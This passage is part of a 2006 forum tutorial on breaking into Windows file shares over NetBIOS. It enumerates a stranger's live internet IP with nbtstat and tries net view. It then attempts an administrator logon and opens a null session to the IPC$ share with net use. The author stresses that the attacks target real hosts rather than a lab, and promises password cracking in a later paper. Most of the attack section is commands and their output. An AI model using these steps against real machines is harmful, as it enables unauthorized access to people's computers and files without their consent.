QUICK
AND SIMPLE NETBIOS EXPLOITATION
WITH WINDOWS XP CONT...
Just
a side note - we scanned for port 445 to as it is possible to have port
139 open but not have the file sharing service running - if port 445 is
open as well as 139 it usually means that the file sharing service is
up and running and could save us some time when choosing which host to
attack.
Fire up the command prompt again and use the in-built NBTSTAT utility
that comes with Windows. The command we give is:
Nbtstat –a [ip address]
Like so:
Code:
H:\>nbtstat -a 81.32.12.240
Local Area Connection:
Node IpAddress: [192.168.2.3] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
MASSAMA <00> UNIQUE Registered
MASSAMA <20> UNIQUE Registered
GRUPO_TRABAJO <00> GROUP Registered
GRUPO_TRABAJO <1E> GROUP Registered
MAC Address = 00-53-45-00-00-00
So what is all this telling us?
Well what we are looking at mainly is the ‘TYPE’ status. We want to see
<20> there. A common misconception is that if you can connect to
a box in the above mentioned manner, that file sharing is enabled. This
is not always the case. When we have connected we need to see the
<20> there to tell us File Sharing is enabled, if it is not there
and you are at a level that means you are reading this – you may as
well move on to another box
The following table lists all the possible entries you can get:
Code:
<computername> 00 U Workstation Service
<computername> 01 U Messenger Service
<.._MSBROWSE_> 01 G Master Browser
<computername> 03 U Messenger Service
<computername> 06 U RAS Server Service
<computername> 1F U NetDDE Service
<computername> 20 U File Server Service
<computername> 21 U RAS Client Service
<computername> 22 U Exchange Interchange
<computername> 23 U Exchange Store
<computername> 24 U Exchange Directory
<computername> 30 U Modem Sharing Server Service
<computername> 31 U Modem Sharing Client Service
<computername> 43 U SMS Client Remote Control
<computername> 44 U SMS Admin Remote Control Tool
<computername> 45 U SMS Client Remote Chat
<computername> 46 U SMS Client Remote Transfer
<computername> 4C U DEC Pathworks TCP/IP Service
<computername> 52 U DEC Pathworks TCP/IP Service
<computername> 87 U Exchange MTA
<computername> 6A U Exchange IMC
<computername> BE U Network Monitor Agent
<computername> BF U Network Monitor Application
<computername> 03 U Messenger Service
<domain> 00 G Domain Name
<domain> 1B U Domain Master Browser
<domain> 1C G Domain Controllers
<domain> 1D U Master Browser
<domain> 1E G Browser Service Elections
<INet~Services> 1C G Internet Information Server
<IS~computername> 00 U Internet Information Server
As you can see there are many different services that we can connect
to. The scope of this paper is File Sharing though, so we will just
concentrate on the <20> field.
So, after discovering we can ‘nbtstat’ to another box and we have
established that the File Sharing Service is running we want to see
what shares are available on a box.
For this we again use an inbuilt command in Windows. The ‘net’ command.
Or more specifically the ‘net view’ command.
Code:
H:\>net view \\81.32.12.240
System error 5 has occurred.
Access is denied.
Woops. Ok so this guy is not as open as he first appeared and we can't
get a list of his shares. This may be because he is not running any
shares or because he has locked down his box and prevented if from
displaying his shares to the casual internet user.
I have put this in to this paper for a few reasons. The first being, if
you scour the internet looking for NetBIOS tutorials, you will find
hundreds that have been wrote and performed and an internal LAN, which
is conveniently setup to allow anonymous access to the File Sharing
service. This paper is using live IP addresses in real life scenarios
on the real internet – not a pre-constructed LAN…..hence you won’t
always be successful first time!
Another reason I left it in is to show that just because you can see
the NetBIOS table and it has the <20> File Sharing service
running, does not mean you can connect to it!
The final reason is to demonstrate that you will not always be
successful with this attack and it can take a lot of trail and error. I
have given lessons in the past that have gone on for in excess of 60
minutes before we have found an open and suitable host.
There are ways to gain access to secured shares but that is in the
scope of the Advanced NetBIOS paper which will follow this one.
Right, so the last command would not let us get a list of the shares
available…..but that does not mean there aren’t any. We can try to
connect to the most obvious ones anyway and see what happens.
We stick with the inbuilt ‘net’ command only this time we use the ‘net
use’ command.
Code:
H:\>net use \\81.32.12.240\ipc$
The password is invalid for \\81.32.12.240\ipc$.
Enter the user name for '81.32.12.240': administrator
Enter the password for 81.32.12.240:
System error 1326 has occurred.
Logon failure: unknown user name or bad password.
OK we don’t know the password…..there are heaps of password crackers
for NetBIOS out there – which I consider to be more advanced so will be
included in the next paper.
We do have the option of connecting via a ‘null’ session however. A
null session does not require a user name or password and will usually
allow a connection attempt.
To signify a null connection attempt we use the “” /U:”” switch at the
end of our command.
Try the following:
Code:
H:\>net use \\81.32.12.240\ipc$ "" /U:""
The command completed successfully.
Now try the ‘net view’ command again to see if we can get a list of the
shares. This may or may not be successful but more often than not it
will fail.(If you are successful read on further down the page to find
what to do next!)
Original Tutorial by
nokia for TheTAZZone-TAZForum
Originally posted on September 20th, 2006 here
Do not use, republish, in whole or in part, without the consent of
the Author. TheTAZZone policy is that Authors retain the rights to the
work they submit and/or post...we do not sell, publish, transmit, or
have the right to give permission for such...TheTAZZone merely retains
the right to use, retain, and publish submitted work within it's
Network.